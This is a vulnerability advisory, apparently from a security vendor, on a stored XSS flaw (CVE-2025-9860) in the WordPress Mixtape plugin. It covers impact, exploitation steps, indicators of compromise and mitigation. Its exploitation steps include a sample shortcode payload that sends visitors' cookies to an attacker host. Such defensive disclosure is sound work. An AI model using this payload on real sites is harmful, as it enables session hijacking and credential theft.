CVE-2025-9860
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-9860 is a Stored Cross-Site Scripting (XSS) vulnerability in the Mixtape plugin for WordPress, affecting all versions up to and including 1.1. The flaw arises from insufficient input sanitization and output escaping on user-supplied attributes within the plugin's mixtape shortcode. Authenticated attackers with contributor-level access or above can inject arbitrary web scripts into pages, which execute whenever a visitor accesses the affected page. It was published on September 11, 2025, with a CVSS v3.1 base score of 6.4 (Medium) (Red Hat CVE, Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability exists in the plugin's front-end class (class-mixtape-front.php, line 75), where attributes passed to the [mixtape] shortcode are not properly sanitized before being rendered in the page output. An authenticated attacker with at least contributor privileges can craft a post or page containing a malicious shortcode attribute embedding JavaScript, which is then stored in the database and executed in the browsers of any user who views the page (Wordfence, WordPress Trac).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, including administrators, enabling session hijacking, credential theft, unauthorized administrative actions, or redirection to malicious sites. The scope is marked as Changed, meaning the impact extends beyond the authenticated attacker's own session to affect other users of the WordPress site. Confidentiality and integrity are both partially impacted, while availability is unaffected (Red Hat CVE, Wordfence).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-9860. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, Red Hat CVE).

Exploitation steps

  1. Gain Contributor Access: Obtain or register a WordPress account with at least contributor-level privileges on a site running the Mixtape plugin version 1.1 or earlier.
  2. Create or Edit a Post: Navigate to the WordPress post editor and create a new post or edit an existing one where the [mixtape] shortcode can be inserted.
  3. Inject Malicious Shortcode: Insert a crafted shortcode with a malicious attribute, for example: [mixtape attribute="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"], exploiting the lack of output escaping.
  4. Publish the Post: Submit or publish the post so the malicious content is stored in the WordPress database.
  5. Trigger Execution: When any user (including administrators) visits the page containing the injected shortcode, the embedded JavaScript executes in their browser, enabling session hijacking, credential theft, or further attacks (Wordfence, WordPress Trac).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or the REST API containing [mixtape shortcode with unusual attribute values including HTML tags or JavaScript.
  • Database: WordPress wp_posts table entries containing [mixtape shortcode with embedded <script> tags or JavaScript event handlers (e.g., onerror, onload) in shortcode attributes.
  • Network: Outbound requests from victim browsers to unexpected external domains shortly after visiting pages containing the Mixtape shortcode, potentially indicating cookie or credential exfiltration.
  • File System: No direct file system artifacts expected for this stored XSS; however, review recently modified posts/pages in the CMS for injected shortcode content.

Mitigation and workarounds

WordPress site administrators should update the Mixtape plugin to a version beyond 1.1 if a patched release is available, or deactivate and remove the plugin until a fix is confirmed. As a workaround, restrict contributor-level user registrations and limit who can publish or submit posts containing shortcodes. Implementing a Web Application Firewall (WAF) with XSS filtering rules can help detect and block exploitation attempts. Wordfence users with the premium plugin benefit from firewall rules that may mitigate this class of attack (Wordfence).

Community reactions

Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for September 8–14, 2025, noting it was discovered and assigned through their threat intelligence program (Wordfence Weekly Report). No significant broader media coverage or notable researcher commentary beyond the initial disclosure has been identified.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NoYesAug 16, 2026
CVE-2026-65640HIGH8.8
  • wordpress
NoYesAug 17, 2026
CVE-2026-11801HIGH7.5
  • wpadverts
NoYesAug 18, 2026
CVE-2026-13700MEDIUM5.9
  • wooms
NoNoAug 17, 2026
CVE-2026-14832MEDIUM5.3
  • shopsmart-loyalty-for-woocommerce
NoNoAug 17, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management